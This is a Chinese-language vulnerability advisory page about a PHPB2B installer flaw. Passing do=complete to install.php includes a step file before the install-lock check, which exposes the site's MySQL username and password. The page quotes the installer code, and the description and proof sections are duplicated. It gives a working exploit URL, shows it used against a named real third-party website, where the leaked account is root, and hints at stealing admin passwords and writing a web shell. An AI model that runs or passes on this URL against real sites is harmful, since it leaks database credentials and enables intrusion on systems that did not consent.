|PHPB2B某处漏洞直接查看mysql密码 - VULHUB开源网络安全威胁库

PHPB2B某处漏洞直接查看mysql密码

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： PHPB2B某处漏洞直接查看mysql密码 ### 详细说明： PHPB2B某处漏洞直接查看mysql密码官网下载的最新版 install/install.php 安装文件，查看下代码。 ``` <?php /** * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved. * The contents of this file are subject to the License; you may not use this file except in compliance with the License. * * @version $Revision: 2048 $ */ session_start(); error_reporting(E_ERROR | E_NOTICE); set_magic_quotes_runtime(0); ini_set('magic_quotes_sybase', 0); ini_set('max_execution_time', '300'); if (isset($_GET['act'])) { if($_GET['act'] == "phpinfo"){ die(phpinfo()); } } if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR','/'); } define('DS', DIRECTORY_SEPARATOR); define('TIME', time()); define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7)); define('MIN_PHP_VERSION', '5.0.0'); //define('JSMIN_AS_LIB', true); // prevents auto-run on include require '../phpb2b_version.php'; require '../configs/config.inc.php'; require '../libraries/core/paths.php'; if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) { echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n"; exit; } define('IN_PHPB2B',true); if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS); require '../libraries/global.func.php'; require '../libraries/func.sql.php'; require "../libraries/db_mysql.inc.php"; require "../libraries/core/object.php"; require "../libraries/core/controller.php"; require "../libraries/file.class.php"; require "../libraries/template.class.php"; require "../libraries/source/error.class.php"; list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']); if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) { $app_lang = strtolower($accept_language); } if (!is_writable(PHPB2B_ROOT."data".DS)) { echo PHPB2B_ROOT."data".DS. " is not writeable.\n"; exit; } if (!empty($_GET['app_lang'])) { $app_lang = $_GET['app_lang']; } if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) { pb_configmake($app_lang); } if (!defined('CACHE_PATH')) { define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS); } //language $smarty = new TemplateEngines(); $sections = array('install', 'javascript'); //da($smarty); $smarty->configLoad('default.conf', $sections); $arrTemplate = $smarty->getConfigVars(); extract($arrTemplate); //:~ $db = new DB_Sql(); $file_cls = new Files(); $pb_protocol = 'http'; if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) { $pb_protocol = 'https'; } $PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']); $BASESCRIPT = basename($PHP_SELF); list($BASEFILENAME) = explode('.', $BASESCRIPT); $install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'); $siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1)); $time_stamp = TIME; if($_REQUEST) { if(!MAGIC_QUOTES_GPC) { $_REQUEST = pb_addslashes($_REQUEST); if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE); } extract($_REQUEST, EXTR_SKIP); } if(!isset($_GET['step'])) { $step = '1'; }else{ $step = intval($_GET['step']); } if (isset($_GET['do'])) { $do = trim($_GET['do']); if($do == "complete"){ include "step".$step.".inc.php"; exit; } } if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 只要传入do=complete就可以包含step文件但是权限检测却在 104-108行 ``` if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 这样的话，我们虽然不能重装，但是却可以拿到重要信息。比如mysql数据库账号密码！！本机演示。 http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png) 因为默认不删除install.php文件，也就是只要安装了phpb2b，那么肯定可以查看msyql密码了，如果开启了远程连接，或者phpmyadmin，直接拿后台密码、写入shell，各种你懂的。因为官方删除了install文件夹，不能演示。网上随便找了个网站。 http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png) 还是root呢~ ### 漏洞证明： PHPB2B某处漏洞直接查看mysql密码官网下载的最新版 install/install.php 安装文件，查看下代码。 ``` <?php /** * [PHPB2B] Copyright (C) 2007-2099, Ualink Inc. All Rights Reserved. * The contents of this file are subject to the License; you may not use this file except in compliance with the License. * * @version $Revision: 2048 $ */ session_start(); error_reporting(E_ERROR | E_NOTICE); set_magic_quotes_runtime(0); ini_set('magic_quotes_sybase', 0); ini_set('max_execution_time', '300'); if (isset($_GET['act'])) { if($_GET['act'] == "phpinfo"){ die(phpinfo()); } } if (!defined('DIRECTORY_SEPARATOR')) { define('DIRECTORY_SEPARATOR','/'); } define('DS', DIRECTORY_SEPARATOR); define('TIME', time()); define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); define('PHPB2B_ROOT', substr(dirname(__FILE__), 0, -7)); define('MIN_PHP_VERSION', '5.0.0'); //define('JSMIN_AS_LIB', true); // prevents auto-run on include require '../phpb2b_version.php'; require '../configs/config.inc.php'; require '../libraries/core/paths.php'; if (version_compare(PHP_VERSION, MIN_PHP_VERSION, '<')) { echo 'PHPB2B '. PHPB2B_VERSION. ' require php'. MIN_PHP_VERSION.', but your php version is ' . PHP_VERSION . ".\n"; exit; } define('IN_PHPB2B',true); if(!defined('LIB_PATH')) define('LIB_PATH',PHPB2B_ROOT.'libraries'.DS); require '../libraries/global.func.php'; require '../libraries/func.sql.php'; require "../libraries/db_mysql.inc.php"; require "../libraries/core/object.php"; require "../libraries/core/controller.php"; require "../libraries/file.class.php"; require "../libraries/template.class.php"; require "../libraries/source/error.class.php"; list($accept_language) = explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']); if(file_exists(PHPB2B_ROOT. 'languages'.DS.strtolower($accept_language).DS."global.csv")) { $app_lang = strtolower($accept_language); } if (!is_writable(PHPB2B_ROOT."data".DS)) { echo PHPB2B_ROOT."data".DS. " is not writeable.\n"; exit; } if (!empty($_GET['app_lang'])) { $app_lang = $_GET['app_lang']; } if (!is_file(PHPB2B_ROOT."data".DS."language".DS.$app_lang.DS."default.conf")) { pb_configmake($app_lang); } if (!defined('CACHE_PATH')) { define('CACHE_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_LANG_PATH', PHPB2B_ROOT."data".DS."cache".DS.$app_lang.DS); define('CACHE_COMMON_PATH', PHPB2B_ROOT."data".DS."cache".DS); } //language $smarty = new TemplateEngines(); $sections = array('install', 'javascript'); //da($smarty); $smarty->configLoad('default.conf', $sections); $arrTemplate = $smarty->getConfigVars(); extract($arrTemplate); //:~ $db = new DB_Sql(); $file_cls = new Files(); $pb_protocol = 'http'; if ( isset( $_SERVER['HTTPS'] ) && ( strtolower( $_SERVER['HTTPS'] ) != 'off' ) ) { $pb_protocol = 'https'; } $PHP_SELF = isset($_SERVER['SCRIPT_NAME']) ? $_SERVER['SCRIPT_NAME'] : preg_replace("/(.*)\.php(.*)/i", "\\1.php", $_SERVER['PHP_SELF']); $BASESCRIPT = basename($PHP_SELF); list($BASEFILENAME) = explode('.', $BASESCRIPT); $install_url = htmlspecialchars($pb_protocol."://".pb_getenv('HTTP_HOST').preg_replace("/\/+(api|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/'); $siteUrl = substr($install_url,0,-(strlen($BASEFILENAME)+1)); $time_stamp = TIME; if($_REQUEST) { if(!MAGIC_QUOTES_GPC) { $_REQUEST = pb_addslashes($_REQUEST); if($_COOKIE) $_COOKIE = pb_addslashes($_COOKIE); } extract($_REQUEST, EXTR_SKIP); } if(!isset($_GET['step'])) { $step = '1'; }else{ $step = intval($_GET['step']); } if (isset($_GET['do'])) { $do = trim($_GET['do']); if($do == "complete"){ include "step".$step.".inc.php"; exit; } } if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 只要传入do=complete就可以包含step文件但是权限检测却在 104-108行 ``` if(file_exists(PHPB2B_ROOT.'data/install.lock')) { $msg = L("install_locked", "tpl"); Errors::showError($msg); exit; } ``` 这样的话，我们虽然不能重装，但是却可以拿到重要信息。比如mysql数据库账号密码！！本机演示。 http://127.0.0.1/phpb2b/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165533f5893620ab28511b59ebfe9d440e80fe.png) 因为默认不删除install.php文件，也就是只要安装了phpb2b，那么肯定可以查看msyql密码了，如果开启了远程连接，或者phpmyadmin，直接拿后台密码、写入shell，各种你懂的。因为官方删除了install文件夹，不能演示。网上随便找了个网站。 http://en.csjci.com/install/install.php?step=5&app_lang=zh-cn&do=complete [<img src="https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/06165606d24a4405120e316edfa2f8eda4567e9d.png) 还是root呢~

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™